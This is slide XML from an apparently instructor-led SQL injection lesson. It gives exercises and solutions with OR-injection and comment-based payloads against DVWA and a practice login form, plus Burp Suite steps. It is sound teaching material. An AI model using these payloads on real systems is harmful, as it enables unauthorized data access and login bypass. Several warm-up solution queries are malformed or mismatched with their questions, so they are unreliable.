              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>='$USER_SSN';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- What value must `$USERNAME` have to generate the query below? What results does this generate?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - `$USERNAME` = `jane' OR '1'='1'; -- `. The final space is important!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - This retrieves _all_ rows from the `accounts` table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- Retrieve account data for `$USERNAME`, as long as they provide the right SSN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>warehouse.accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE name='jane' OR '1'='1'; -- AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>='$USER_SSN';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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93823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Let students know that the next exercise affords an opportunity to use the substitution experience from the previous exercise to craft an injection payload with an OR clause. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This causes the database to dump more data than intended, and can be used for more dangerous attacks that we’ll study later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slack out the instructions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_OR_Injection</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3468981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dirty="0"/>
              <a:t>Activities/Stu_OR_Injection/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (duplicated below).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t># OR Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>This exercise requires DVWA, launched via Docker. Run:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  docker run --rm -p 80:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>/web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Then, use Firefox to navigate to the appropriate URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Mac**: `http://localhost`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Windows**: `http://192.168.99.100`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Log in with the credentials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- **Username**: admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- **Password**: password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Click **Create / Reset Database** at the bottom of the setup page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Log in again when prompted click **SQL Injection** in the menu on the left.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Then, follow the instructions below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>## Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>DVWA uses the ID value you submit to complete the following query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> = '$id';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>So, if you submit an ID of 1, it runs the query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> = '1';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Keep this in mind as you work through the instructions below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Write a SQL injection payload that results in the query below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `' OR '1'='1`. Note that there is **no final quotation mark.**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> = '' OR '1'='1';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Use the web form to submit your payload. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - How many users are in the database?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: There are five users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Next, submit your payload directly through the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - **Mac**: `http://localhost/vulnerabilities/sqli?id=1'%20OR%20'1'='1`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - **Windows**: http://192.168.99.100/vulnerabilities/sqli?id=1'%20OR%20'1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Finally, launch Burp Suite, and:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Navigate to the SQL injection page on DVWA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Intercept a request to this page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Send the request to Repeater.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Replace the value of the `id` parameter in the intercepted request with your payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Press **Go**, and inspect the response. You should get the same result you got with the previous two methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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402961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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>15 minute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> break.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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858351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the OR injection from the previous exercise is compelling, but ultimately harmless—it didn’t allow us to retrieve “hidden” data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let students know that the same technique can be used for a much more dangerous purpose, however: Bypassing a login form.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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227925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2553037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194590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Empjhasize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tha</a:t>
            </a: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4431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19967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dirty="0"/>
              <a:t>Activities/Stu_SQL_Warm_Up/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (duplicated below).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t># SQL Warm-Up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>## Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Please navigate to the fiddle at: &lt;https://www.db-fiddle.com/f/upnxDj1JbZyQeG7BKNqAUL/0&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>### SELECT WHERE with Conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Load the fiddle at the above link. Then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Select all users whose last name is `Doe`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `SELECT * WHERE last='Doe';`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Select all users whose last name is `Doe` _or_ `Competent`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `SELECT * WHERE last='Doe' OR `Competent';`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Select all users whose first name is `Jane` _and_ whose password is `asdf772nx`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `SELECT * WHERE last='Jane' AND password='asdf772nx';`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>### Questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>The Queries below seem strange, but you'll use them in your SQL injections. For now, just try to understand why they produce the results they do, not why you'd write queries like this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- This is Query #4. What is the result? What does the OR clause do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>site_data.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE first='Jane' OR '1'='1';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- TODO: This is Query #5. What is the result? What does the AND clause do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>site_data.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE first='Jane' AND password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>uwasf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- TODO: This is Query #6. What is the result? What does the AND clause do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>site_data.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE first='Jane' OR '1'='1' -- AND password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>uwasf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>**Solutions**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- The first query retrieves the record for `Jane Doe`. The `OR` clause just says: Do _not_ return a result of this condition is false. Since `'1'='1'` is always true, it doesn't change the result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- The second query retrieves no record. This is what would happen if someone tried to log into Jane's account with the wrong password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- The third query retrieves the record for Jane. This is the same as the first query, since the AND clause is commented out. This means it does nothing in this query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Let students know they'll see why strange queries like this are useful when you study Login Bypasses.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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57233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88927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498550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3919058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 Navigate to the vulnerable login form at: &lt;http://ptl-b1464393-cabeb391.libcurl.so/login.php&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that this login form is vulnerable to a SQL injection attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Explain that you can test if a login form is vulnerable to SQL injection by injecting special characters, like quotation marks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Let students know they should try injecting both a single quote (`'`) and a double quote (`"`) when testing for the presence of SQL injections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Demonstrate the presence of the vulnerability by entering a single quote (`'`) as the username, and submitting the form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- This produces the error below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and password=md5('')' at line 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Emphasize that errors like this often reveal the presence of SQL injection vulnerabilities. The next step is to test a payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Submit the data below.</a:t>
